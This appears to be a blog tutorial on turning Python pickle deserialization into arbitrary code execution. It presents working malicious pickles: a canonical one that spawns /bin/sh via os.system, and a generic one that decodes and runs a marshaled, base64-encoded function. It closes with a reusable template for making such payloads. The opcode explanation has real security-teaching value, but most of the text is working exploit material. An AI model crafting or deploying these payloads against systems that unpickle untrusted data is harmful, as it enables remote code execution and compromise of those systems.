Don't unpickle a Python pickle that you did not create yourself from known data. That's old news. The Python documentation for the pickle module clearly states,
Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
It's well-documented that it's easy to construct malicious pickles which, when unpickled produce a shell, even a remote shell. Nelson Elhage demonstrates a very simple process for getting a remote shell by using subprocess.Popen. Marco Slaviero shows how to build various standard shellcodes, including bind and connect shellcodes but these are basically unreadable and programming in pickle is only mildly entertaining as a diversion and, as I'll demonstrate, almost completely unnecessary.
Let's start with the canonical Python pickle shellcode, which we'll save as canonical.pickle.
cos system (S'/bin/sh' tR.
Let's try to unpack the pickle and see what results.
>>> import pickle >>> pickle.load(open('canonical.pickle')) sh-3.2$
Pickle is a stack language which means that the pickle instructions push data onto the stack or pop data off of the stack and operate on it in some fashion. To understand how the canonical pickle works, we need only understand six pickle instructions:
c: Read to the newline as the module name, module. Read the next line as the object name, object. Push module.object onto the stack.
(: Insert a marker object onto the stack. For our purpose, this is paired with t to produce a tuple.
t: Pop objects off the stack until a ( is popped and create a tuple object containing the objects popped (except for the () in the order they were pushed onto the stack. The tuple is pushed onto the stack
S: Read the string in quotes up to the newline and push it onto the stack.
R: Pop a tuple and a callable off the stack and call the callable with the tuple as arguments. Push the result onto the stack.
.: End of the pickle.
These are the only instructions we'll need to get arbitrary Python code execution.
Taking a look at the canonical pickle shellcode, we see that the builtin function os.system is pushed onto the stack first. Then, a marker object and the string ’/bin/sh’ are pushed. The t produces a 1-element tuple (’/bin/sh’,). At this point the stack contains two elements: os.system and (’/bin/sh’,). The R pops both arguments and calls os.system(’/bin/sh’), pushing the result — the shell return value — onto the stack.
To execute arbitrary python we would like to be able to pickle code, however, that does not work. Fortunately, since version 2.6, Python contains a marshal module which can serialize code. Our basic task is to write arbitrary code as a Python function, marshal the function, base64 encode it, and insert it into a generic pickle which will decode, unmarshal, and call the function.
For our arbitrary computation, let's compute (very slowly) the 10 Fibonacci number, print it out, and then get a shell.
import marshal import base64 def foo(): import os def fib(n): if n <= 1: return n return fib(n-1) + fib(n-2) print 'fib(10) =', fib(10) os.system('/bin/sh') print base64.b64encode(marshal.dumps(foo.func_code))
Note that since Python lets us import modules and define functions inside of functions. We can write just about any code we would like in our foo function.
Running this code produces:
YwAAAAABAAAAAgAAAAMAAABzOwAAAGQBAGQAAGwAAH0AAIcAAGYBAGQCAIYAAIkAAGQDAEeIAABkBACDAQBHSHwAAGoBAGQFAIMBAAFkAABTKAYAAABOaf////9jAQAAAAEAAAAEAAAAEwAAAHMsAAAAfAAAZAEAawEAchAAfAAAU4gAAHwAAGQBABiDAQCIAAB8AABkAgAYgwEAF1MoAwAAAE5pAQAAAGkCAAAAKAAAAAAoAQAAAHQBAAAAbigBAAAAdAMAAABmaWIoAAAAAHMEAAAAYS5weVIBAAAABgAAAHMGAAAAAAEMAQQBcwkAAABmaWIoMTApID1pCgAAAHMHAAAAL2Jpbi9zaCgCAAAAdAIAAABvc3QGAAAAc3lzdGVtKAEAAABSAgAAACgAAAAAKAEAAABSAQAAAHMEAAAAYS5weXQDAAAAZm9vBAAAAHMIAAAAAAEMAQ8EDwE=
We want to construct a generic pickle into which we can insert arbitrary base64 encoded functions such as the above and run them. In essence, we want to produce a pickle that executes the following Python where code_enc is our encoded function.
(types.FunctionType(marshal.loads(base64.b64decode(code_enc)), globals(), ''))()
More readably,
code_str = base64.b64decode(code_enc)
code = marshal.loads(code_str)
func = types.FunctionType(code, globals(), '')
func()
Let's build this up by parts. To call base64.b64decode(code_enc), we can do the exact same thing we did with os.system:
cbase64 b64decode (S'YwAAA...' tR
We can add the call to marshal.loads in the same way:
cmarshal loads (cbase64 b64decode (S'YwAAA...' tRtR
The globals function can be called the same way using the __builtin__ module:
c__builtin__ globals (tR
To construct the function, we can combine these to get
ctypes FunctionType (cmarshal loads (cbase64 b64decode (S'YwAAA...' tRtRc__builtin__ globals (tRS'' tR
Finally, we need to call the function that appears on the top of the stack by appending (tR. (where the period ends the pickle).
Putting the pieces all together, we get a generic pickle
ctypes FunctionType (cmarshal loads (cbase64 b64decode (S'YwAAAAABAAAAAgAAAAMAAABzOwAAAGQBAGQAAGwAAH0AAIcAAGYBAGQCAIYAAIkAAGQDAEeIAABkBACDAQBHSHwAAGoBAGQFAIMBAAFkAABTKAYAAABOaf////9jAQAAAAEAAAAEAAAAEwAAAHMsAAAAfAAAZAEAawEAchAAfAAAU4gAAHwAAGQBABiDAQCIAAB8AABkAgAYgwEAF1MoAwAAAE5pAQAAAGkCAAAAKAAAAAAoAQAAAHQBAAAAbigBAAAAdAMAAABmaWIoAAAAAHMEAAAAYS5weVIBAAAABgAAAHMGAAAAAAEMAQQBcwkAAABmaWIoMTApID1pCgAAAHMHAAAAL2Jpbi9zaCgCAAAAdAIAAABvc3QGAAAAc3lzdGVtKAEAAABSAgAAACgAAAAAKAEAAABSAQAAAHMEAAAAYS5weXQDAAAAZm9vBAAAAHMIAAAAAAEMAQ8EDwE=' tRtRc__builtin__ globals (tRS'' tR(tR.
>>> import pickle >>> pickle.load(open('generic.pickle')) fib(10) = 55 sh-3.2$
Changing the executed code requires merely changing the foo function, running the Python program that prints out the marshaled and encoded function, and replacing the base64 encoded string in generic.pickle.
Here's a handy template.
import marshal import base64 def foo(): pass # Your code here print """ctypes FunctionType (cmarshal loads (cbase64 b64decode (S'%s' tRtRc__builtin__ globals (tRS'' tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))